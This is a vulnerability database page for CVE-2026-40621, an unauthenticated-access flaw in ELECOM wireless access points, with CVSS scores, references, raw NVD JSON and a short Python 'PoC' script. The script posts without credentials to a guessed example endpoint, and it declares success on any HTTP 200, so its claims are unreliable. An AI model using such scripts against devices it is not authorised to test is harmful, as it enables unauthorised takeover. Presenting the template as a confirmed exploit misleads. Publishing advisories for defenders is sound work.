CVE-2026-40621

Description

ELECOM wireless LAN access point devices do not require authentication to access some specific URLs. The affected product may be operated without authentication.

CVSS Details

CVSS Score

9.8

Severity

CRITICAL

CVSS Vector

CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

Configurations (Affected Products)

No configuration data available.

ELECOM wireless LAN access point devices (具体受影响型号请参考厂商安全公告)

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

import requests

# Target configuration
target_ip = "192.168.1.1"  # Replace with the actual IP of the device
vulnerable_url = f"http://{target_ip}/admin/command.cgi"  # Example vulnerable endpoint

# Payload to change settings or execute commands
# Specific parameters depend on the device firmware analysis
payload = {
    "set_system_language": "en",
    "save": "Save"
}

try:
    # Sending request without authentication headers
    response = requests.post(vulnerable_url, data=payload, timeout=10)

    if response.status_code == 200:
        print("[+] Exploit successful! Operation performed without authentication.")
        print("[+] Response:", response.text)
    else:
        print("[-] Request failed. Status code:", response.status_code)

except requests.exceptions.RequestException as e:
    print("[-] An error occurred:", e)

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2026-40621
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2026-40621
[3] CVE Details https://www.cvedetails.com/cve/CVE-2026-40621/
[4] VulDB https://vuldb.com/cve/CVE-2026-40621
[5] https://jvn.jp/en/jp/JVN03037325/
[6] https://www.elecom.co.jp/news/security/20260512-01/

Raw JSON Data

JSON

{"cve": {"id": "CVE-2026-40621", "sourceIdentifier": "[email protected]", "published": "2026-05-13T13:16:42.750", "lastModified": "2026-05-13T15:47:10.327", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "ELECOM wireless LAN access point devices do not require authentication to access some specific URLs. The affected product may be operated without authentication."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 9.3, "baseSeverity": "CRITICAL", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "NONE", "userInteraction": "NONE", "vulnConfidentialityImpact": "HIGH", "vulnIntegrityImpact": "HIGH", "vulnAvailabilityImpact": "HIGH", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV30": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.0", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "baseScore": 9.8, "baseSeverity": "CRITICAL", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 3.9, "impactScore": 5.9}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-288"}]}], "references": [{"url": "https://jvn.jp/en/jp/JVN03037325/", "source": "[email protected]"}, {"url": "https://www.elecom.co.jp/news/security/20260512-01/", "source": "[email protected]"}]}}